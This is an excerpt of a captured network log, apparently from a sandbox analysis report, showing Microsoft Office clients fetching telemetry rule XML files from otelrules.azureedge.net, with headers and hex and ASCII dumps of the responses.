                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:33 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 501
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                            x-ms-request-id: b5a95b30-c01e-002b-0632-3c6e00000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032733Z-178bfbc474bpnd5vhC1NYC4vr400000002fg000000002c7x
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:33 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            96192.168.2.44992513.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:33 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:33 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:33 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 3342
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                            x-ms-request-id: abaf503b-901e-0064-2b47-3ce8a6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032733Z-178bfbc474bnwsh4hC1NYC2ubs00000002c000000000mx55
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:33 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            97192.168.2.44992713.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:34 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:35 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:35 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 2284
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                            x-ms-request-id: d35eb2be-501e-0064-3d8c-3a1f54000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032735Z-178bfbc474brk967hC1NYCfu60000000023g00000000ku5k
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:35 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            98192.168.2.44992913.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:35 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:35 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:35 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                            x-ms-request-id: c1a1f15b-901e-005b-358c-3a2005000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032735Z-174c587ffdf8lw6dhC1TEBkgs800000000w0000000009sy1
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:35 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            99192.168.2.44992813.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:35 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:35 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:35 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                            x-ms-request-id: d2879cce-801e-0047-5869-3b7265000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032735Z-178bfbc474btvfdfhC1NYCa2en00000002b000000000qn3w
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:35 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            100192.168.2.44993013.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:35 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:35 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:35 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                            x-ms-request-id: 3994331f-f01e-0071-696c-3b431c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032735Z-174c587ffdfb485jhC1TEBmc1s00000000q000000000bhf8
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:35 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            101192.168.2.44993113.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:35 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:36 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:35 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                            x-ms-request-id: 923400a1-601e-005c-187f-3bf06f000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032735Z-174c587ffdftjz9shC1TEBsh9800000000ug000000000mgm
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:36 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            102192.168.2.44993213.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:37 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:37 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                            x-ms-request-id: 1a87898e-001e-002b-2066-3b99f2000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032737Z-178bfbc474bnwsh4hC1NYC2ubs00000002f000000000bd78
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:37 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            103192.168.2.44993413.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:37 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:37 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                            x-ms-request-id: b9d90d28-901e-00a0-5d63-3b6a6d000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032737Z-178bfbc474b9fdhphC1NYCac0n000000028000000000k09g
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:37 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            104192.168.2.44993313.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:37 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:37 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                            x-ms-request-id: fde4123d-901e-00a0-613d-3c6a6d000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032737Z-178bfbc474b9fdhphC1NYCac0n000000027g00000000n2xq
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
